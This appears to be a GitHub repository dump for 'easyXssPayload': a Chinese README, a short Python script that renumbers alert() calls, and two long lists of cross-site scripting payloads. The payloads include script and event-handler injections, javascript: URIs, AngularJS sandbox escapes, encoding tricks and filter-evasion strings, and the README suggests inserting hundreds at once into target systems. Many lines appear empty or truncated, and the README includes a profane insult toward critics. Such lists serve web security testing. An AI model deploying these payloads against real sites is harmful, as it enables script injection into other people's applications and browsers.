├── README.md ├── xss.py ├── burpXssPayload.txt └── easyXssPayload.txt /README.md: -------------------------------------------------------------------------------- 1 | 2 | # easyXssPayload 3 | 4 | 5 | # 食用指南 How To Use It 6 | 7 | ------- 8 | 9 | * 如非本地测试不建议拿burp一条一条的写到目标系统，因为删除麻烦。 10 | * 相比fork更建议star，因为这个Payload打算每隔一段时间就更新一下，确保其时效性。 11 | * 如无字节数限制建议手工一次插入500条进行测试，推荐火狐浏览器，有些浏览器(Safari)扛不住一次性渲染那么多标签，贼卡。 12 | 13 | 核心文件：[easyXssPayload.txt](https://github.com/TheKingOfDuck/easyXssPayload/blob/master/easyXssPayload.txt) 14 | 15 | 基本用法：[浅析一种简单暴力的Xss Fuzz手法](https://xz.aliyun.com/t/4985) 16 | 17 | ------- 18 | 19 | ## 杠精我日你全家 Hater Mother Fuck 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /xss.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name： xss 5 | Description : 6 | Author : CoolCat 7 | date： 2019/4/27 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/4/27: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'CoolCat' 14 | 15 | import re 16 | n = 0 17 | for xss in open("xssPayload.txt"): 18 | n += 1 19 | try: 20 | alert = re.findall(r"alert\((.+?)\)", xss) 21 | print(alert[0]) 22 | xss = xss.replace(alert[0],str(n)) 23 | print(xss) 24 | f = open("easyXssPayload.txt","a") 25 | f.write(xss) 26 | f.close() 27 | except: 28 | pass 29 | -------------------------------------------------------------------------------- /burpXssPayload.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 25 | 31 | 32 |

33 |

34 | 35 | 36 | 38 |

39 | XSS 40 |

41 |

test

42 | 43 | 44 | 45 | 46 |

47 | 48 | test 49 | test 50 | test 51 | 52 | test 53 | test 54 | test 55 | test 56 | test 57 | test 58 | test 59 | test 60 | test 61 |

drag me

drop here 62 | test 63 |

drag me

drop here 64 | 65 |

66 | test 67 | test 68 | test 69 | test 70 | test 71 | test 72 | test 73 | test 74 | test 75 | test 76 | test 77 |

78 | 79 | 80 |

81 |

82 | 83 | 84 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 123 | 124 | XSS 125 | (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) 126 | (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) 127 | Test 128 |

129 | 130 | +ADw-script+AD4-alert(130)+ADw-/script+AD4- 131 | +ADw-script+AD4-alert(131)+ADw-/script+AD4- 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | XSS XSS 140 | XSS 141 | XSS 142 | XSS 143 | XSS 144 | XSS 145 | XSS 146 | Firefox 147 | Firefox 148 | 149 | {{constructor.constructor('alert(149)')()}} 150 | {{$on.constructor('alert(150)')()}} 151 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(151)')()}} 152 | {{{}.")));alert(152)//"}} 153 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(153)')()}} 154 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(154)"].sort(toString.constructor);}} 155 | {{{}.")));alert(155)//"}} 156 | {{{}.")));alert(156)//"}} 157 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(157)//');}} 158 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(158)//');}} 159 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(159)');}} 160 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(160)//');}} 161 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(161)');}} 162 | {{constructor.constructor('alert(162)')()}} 163 | {{$on.constructor('alert(163)')()}} 164 | constructor.constructor('alert(164)')() 165 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(165)')() 166 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(166)"].sort(toString.constructor) 167 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(167)')() 168 | {}.")));alert(168)//"; 169 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(169)//'; 170 | constructor.constructor('alert(170)')() 171 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41) 172 | 173 | 174 | 175 |

foo

{{ [1].reduce(value.alert, 1); }}

176 |

202 | 203 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 |

209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 |

221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | \x3Cscript>javascript:alert(352) 230 | '"`> 231 | 235 | 236 | -->

--> 237 | --> 238 | --> 239 | --> 240 | `"'>

DEF 265 | "'`>ABC

DEF 266 | 267 | 268 | 269 | '`"><\x3Cscript>javascript:alert(392) 270 | '`"><\x00script>javascript:alert(393) 271 | "'`><\x3Cimg src=xxx:x onerror=javascript:alert(394)> 272 | "'`><\x00img src=xxx:x onerror=javascript:alert(395)> 273 | 274 | 275 | 276 | 277 | javascript:alert(400); 278 | javascript:alert(401); 279 | javascript:alert(402); 280 | javascript:alert(403); 281 | javascript:alert(404); 282 | javascript:alert(405); 283 | javascript:alert(406); 284 | ABC

DEF 285 | ABC

DEF 286 | ABC

DEF 287 | ABC

DEF 288 | ABC

DEF 289 | ABC

DEF 290 | ABC

DEF 291 | ABC

DEF 292 | ABC

DEF 293 | ABC

DEF 294 | ABC

DEF 295 | ABC

DEF 296 | ABC

DEF 297 | ABC

DEF 298 | ABC

DEF 299 | ABC

DEF 300 | ABC

DEF 301 | ABC

DEF 302 | ABC

DEF 303 | ABC

DEF 304 | ABC

DEF 305 | ABC

DEF 306 | ABC

DEF 307 | ABC

DEF 308 | ABC

DEF 309 | ABC

DEF 310 | ABC

DEF 311 | test 312 | test 313 | test 314 | test 315 | test 316 | test 317 | test 318 | test 319 | test 320 | test 321 | test 322 | test 323 | test 324 | test 325 | test 326 | test 327 | test 328 | test 329 | test 330 | test 331 | test 332 | test 333 | test 334 | test 335 | test 336 | test 337 | test 338 | test 339 | test 340 | test 341 | test 342 | test 343 | test 344 | test 345 | test 346 | test 347 | test 348 | test 349 | test 350 | test 351 | test 352 | test 353 | test 354 | test 355 | test 356 | test 357 | test 358 | test 359 | test 360 | test 361 | test 362 | test 363 | test 364 | test 365 | test 366 | test 367 | test 368 | `"'>

369 | `"'>

370 | `"'>

371 | `"'>

372 | `"'>

373 | `"'>

374 | `"'>

375 | `"'>

376 | `"'>

377 | `"'>

378 | "`'> 379 | "`'> 380 | "`'> 381 | "`'> 382 | "`'> 383 | "`'> 384 | "`'> 385 | "`'> 386 | "`'> 387 | "`'> 388 | "`'> 389 | "`'> 390 | "`'> 391 | "`'> 392 | "`'> 393 | "`'> 394 | "`'> 395 | "`'> 396 | "`'> 397 | "`'> 398 | "`'> 399 | "`'> 400 | "`'> 401 | "`'> 402 | "`'> 403 | "`'> 404 | "`'> 405 | "`'> 406 | "`'> 407 | "`'> 408 | "`'> 409 | "`'> 410 | "`'> 411 | "`'> 412 | "`'> 413 | "`'> 414 | "`'> 415 | "/> 416 | "/> 417 | "/> 418 | "/> 419 | "/> 420 | "/> 421 | "/> 422 | "/> 423 | "/> 424 | javascript:alert(547) 425 | javascript:alert(548) 426 | javascript:alert(549) 427 | javascript:alert(550) 428 | javascript:alert(551) 429 | javascript:alert(552) 430 | javascript:alert(553) 431 | `"'>

432 | `"'>

433 | `"'>

434 | `"'>

435 | `"'>

436 | `"'>

437 | `"'>

438 | 459 |

460 | alert(583)0 461 |

462 | 463 | 464 | 465 | 466 | "> 469 | "> 470 | "> 471 | "> 472 | 473 | <% foo> 474 |
475 | 476 | 477 | 478 | 479 | 480 | 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | XXX 510 | 511 | 512 | 513 | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(636)></a>"> 514 |  515 |  516 | <object id="x" classid="clsid:CB927D6392-4FF7-4a9e-A63969-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C6397-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(639)" style="behavior:url(#x);"><param name=postdomevents /></object> 517 | <a style="-o-link:'javascript:javascript:alert(640)';-o-link-source:current">X 518 | <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(641)'}{}*{-o-link-source:current}]{color:red};</style> 519 | <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(642))%7d 520 | <style>@import "data:,*%7bx:expression(javascript:alert(643))%7D";</style> 521 | <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(644);">XXX</a></a><a href="javascript:javascript:alert(644)">XXX</a> 522 | <// style=x:expression\28javascript:alert(645)\29> 523 | <style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(646))}</style> 524 | <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(647));">X 525 | <script>({set/**/$($){_/**/setter=$,_=javascript:alert(648)}}).$=eval</script> 526 | <script>({0:#0=eval/#0#/#0#(javascript:alert(649))})</script> 527 | <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(650)}),x</script> 528 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(651)')()</script> 529 | <meta charset="mac-farsi">¼script¾javascript:alert(652)¼/script¾ 530 | X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(653)` > 531 | 654<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䙔vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(654)>`> 532 | 655<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(655)>> 533 | 656<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(656) strokecolor=white strokeweight=656000px from=0 to=656000 /></a> 534 | <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(657)">XXX</a> 535 | <event-source src="%(event)s" onload="javascript:alert(658)"> 536 | <a href="javascript:javascript:alert(659)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> 537 | <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img򡒴src=x:x򡒴onerror򡒴=javascript:alert(660)>"> 538 | <script>javascript:alert(661)</script> 539 | <IMG SRC="javascript:javascript:alert(662);"> 540 | <IMG SRC=javascript:javascript:alert(663)> 541 | <IMG SRC=`javascript:javascript:alert(664)`> 542 | <FRAMESET><FRAME SRC="javascript:javascript:alert(665);"></FRAMESET> 543 | <BODY ONLOAD=javascript:alert(666)> 544 | <BODY ONLOAD=javascript:javascript:alert(667)> 545 | <IMG SRC="jav ascript:javascript:alert(668);"> 546 | <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(669)> 547 | <IMG SRC="javascript:javascript:alert(670)" 548 | <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(671);"> 549 | <IMG DYNSRC="javascript:javascript:alert(672)"> 550 | <IMG LOWSRC="javascript:javascript:alert(673)"> 551 | <BGSOUND SRC="javascript:javascript:alert(674);"> 552 | <BR SIZE="&{javascript:alert(675)}"> 553 | <LINK REL="stylesheet" HREF="javascript:javascript:alert(676);"> 554 | <STYLE>li {list-style-image: url("javascript:javascript:alert(677)");}</STYLE><UL><LI>XSS 555 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(678);"> 556 | <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(679);"> 557 | <IFRAME SRC="javascript:javascript:alert(680);"></IFRAME> 558 | <TABLE BACKGROUND="javascript:javascript:alert(681)"> 559 | <TABLE><TD BACKGROUND="javascript:javascript:alert(682)"> 560 | <DIV STYLE="background-image: url(javascript:javascript:alert(683))"> 561 | <DIV STYLE="width:expression(javascript:alert(684));"> 562 | <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(685))"> 563 | <XSS STYLE="xss:expression(javascript:alert(686))"> 564 | <STYLE TYPE="text/javascript">javascript:alert(687);</STYLE> 565 | <STYLE>.XSS{background-image:url("javascript:javascript:alert(688)");}</STYLE><A CLASS=XSS></A> 566 | <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(689)")}</STYLE> 567 |  568 | <BASE HREF="javascript:javascript:alert(691);//"> 569 | <OBJECT classid=clsid:ae24fdae-03c6-692692d692-8b76-0080c744f389><param name=url value=javascript:javascript:alert(692)></OBJECT> 570 | <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javascript:javascript:alert(693)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> 571 | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(694)</SCRIPT>"></BODY></HTML> 572 | <form id="test" /><button form="test" formaction="javascript:javascript:alert(695)">X 573 | <body onscroll=javascript:alert(696)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> 574 | <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(697)"> 575 | <STYLE>a{background:url('s698' 's2)}@import javascript:javascript:alert(698);');}</STYLE> 576 | <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(699)&&;&&<&&/script&&> 577 | <SCRIPT onreadystatechange=javascript:javascript:alert(700);></SCRIPT> 578 | <style onreadystatechange=javascript:javascript:alert(701);></style> 579 | <?xml version="702.0"?><html:html xmlns:html='http://www.w3.org/702999/xhtml'><html:script>javascript:alert(702);</html:script></html:html> 580 | <embed code=javascript:javascript:alert(703);></embed> 581 | <frameset onload=javascript:javascript:alert(704)></frameset> 582 | <object onerror=javascript:javascript:alert(705)> 583 | <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(706);">]]</C><X></xml> 584 | <IMG SRC=&{javascript:alert(707);};> 585 | <a href="javAascript:javascript:alert(708)">test708</a> 586 | <a href="javaascript:javascript:alert(709)">test709</a> 587 | <iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(710)>>"> 588 | ';alert(711))//';alert(711))//"; 589 | alert(712))//";alert(712))//-- 590 | ></SCRIPT>">'><SCRIPT>alert(713))</SCRIPT> 591 | <IMG SRC="javascript:alert(714);"> 592 | <IMG SRC=javascript:alert(715)> 593 | <IMG SRC=JaVaScRiPt:alert(716)> 594 | <IMG SRC=javascript:alert(717)> 595 | <IMG SRC=`javascript:alert(718)`> 596 | <a onmouseover="alert(719)">xxs link</a> 597 | <a onmouseover=alert(720)>xxs link</a> 598 | <IMG """><SCRIPT>alert(721)</SCRIPT>"> 599 | <IMG SRC=javascript:alert(722))> 600 | <IMG SRC=# onmouseover="alert(723)"> 601 | <IMG SRC= onmouseover="alert(724)"> 602 | <IMG onmouseover="alert(725)"> 603 | <IMG SRC="jav ascript:alert(726);"> 604 | <IMG SRC="jav ascript:alert(727);"> 605 | <IMG SRC="jav ascript:alert(728);"> 606 | <IMG SRC="jav ascript:alert(729);"> 607 | perl -e 'print "<IMG SRC=java\0script:alert(730)>";' > out 608 | <IMG SRC=" javascript:alert(731);"> 609 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(732)> 610 | <<SCRIPT>alert(733);//<</SCRIPT> 611 | <IMG SRC="javascript:alert(734)" 612 | \";alert(735);// 613 | 614 | 615 | 616 | 617 | 618 |
XSS
619 | 620 | 621 |
622 | 623 | 624 | 625 | exp/* 626 | 627 | 628 | 629 | 630 | 631 | ¼script¾alert(754)¼/script¾ 632 | 633 | 634 | 635 | 636 | 637 | 638 |
639 |
640 |
641 |
642 | 643 | alert(766)'); ?> 644 | 645 | +ADw-SCRIPT+AD4-alert(768);+ADw-/SCRIPT+AD4- 646 | /*%00*/alert(770)/*%00*/ 649 | 650 | 651 | http://www.google<script .com>alert(774)</script 652 | <script ^__^>alert(775))</script ^__^ 653 | </style  ><script   :-(>/**/alert(776)/**/</script   :-( 654 | </form><input type᩹"date" onfocus="alert(777)"> 655 | <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(778)&NewLine;>X</a> 656 | <script ~~~>alert(779)</script ~~~> 657 | <iframe/%00/ src=javaSCRIPT&colon;alert(780) 658 | <% 659 | <script src="data:text/javascript,alert(782)"></script> 660 | <iframe/onreadystatechange=alert(783) 661 | <svg/onload=alert(784) 662 | <input type="text" value=`` <div/onmouseover='alert(785)'>X</div> 663 | http://www.<script>alert(786)</script .com 664 | <svg><script ?>alert(787) 665 | <img src=`xx:xx`onerror=alert(788)> 666 | <meta http-equiv="refresh" content="0;javascript&colon;alert(789)"/> 667 | <script>+-+-790-+-+alert(790)</script> 668 | <body/onload= 698 | <script src="data:text/javascript,alert(821)"></script> 699 | <iframe/onreadystatechange=alert(822) 700 | <svg/onload=alert(823) 701 | <input type="text" value=`` <div/onmouseover='alert(824)'>X</div> 702 | http://www.<script>alert(825)</script .com 703 | <svg><script ?>alert(826) 704 | <img src=`xx:xx`onerror=alert(827)> 705 | <meta http-equiv="refresh" content="0;javascript&colon;alert(828)"/> 706 | <script>+-+-829-+-+alert(829)</script> 707 | <body/onload=</SCRIPT>">'><SCRIPT>alert(856))</SCRIPT> 734 | <IFRAME SRC="javascript:alert(857);"> 735 | < 736 | <"';alert(859))//\';alert(859))//";alert(859))//\";alert(859))//-->">'> 737 | ';alert(860))//\';alert(860))//";alert(860))//\";alert(860))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 739 | &search=1 740 | 0&q=';alert(863))//\';alert%2?8863))//";alert(String.fromCharCode?(88,83,83))//\";alert(863)%?29//-->">'>&submit-frmGoogleWeb=Web+Search 741 | 742 |

...

743 |